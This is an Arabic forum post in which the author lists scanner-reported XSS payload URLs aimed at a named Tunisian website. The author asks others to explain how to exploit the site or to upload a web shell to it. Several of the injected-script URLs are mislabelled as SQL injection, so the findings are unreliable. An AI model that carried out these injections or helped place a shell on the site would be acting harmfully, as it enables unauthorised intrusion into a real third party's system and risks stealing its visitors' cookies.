السلام عليكم
قمت بفحص لأحد المواقع و وجدت هده الثغرات لكن لم أستطع أن أستغلها
رجاء من يفسر لي كيفية إستغلا لها أو يرفع لي شل في هدا الموقع :biggrin9gp[1]:
هده الثغرات بعد الفحص :
:الثغرات
ثغرة أمنية لحقن إستعلام SQL Injection
نوع الطلب: GET
http://www.jeunesse-environnement.tn/index.php?format=<script>alert('hacking%20xss')</script>
وجد خطأ في كود الموقع يسمح بإضافة وتنفيذ إستعلام SQL عن بعد
ثغرة تنفيذ سكربت Cross-Site Scripting - XSS
نوع الطلب: GET
http://www.jeunesse-environnement.tn/index.php?format=feed&type=rss&lang=fr<scr ipt>alert('hacking%20xss')</script>
ثغرة حقن سكربت XSS وهي احدى ثغرات المواقع التي يتم من خلالها الوصول للكوكيز
ثغرة أمنية لحقن إستعلام SQL Injection
نوع الطلب: GET
http://www.jeunesse-environnement.tn/index.php?format=<script>alert('hacking%20xss')</script>
وجد خطأ في كود الموقع يسمح بإضافة وتنفيذ إستعلام SQL عن بعد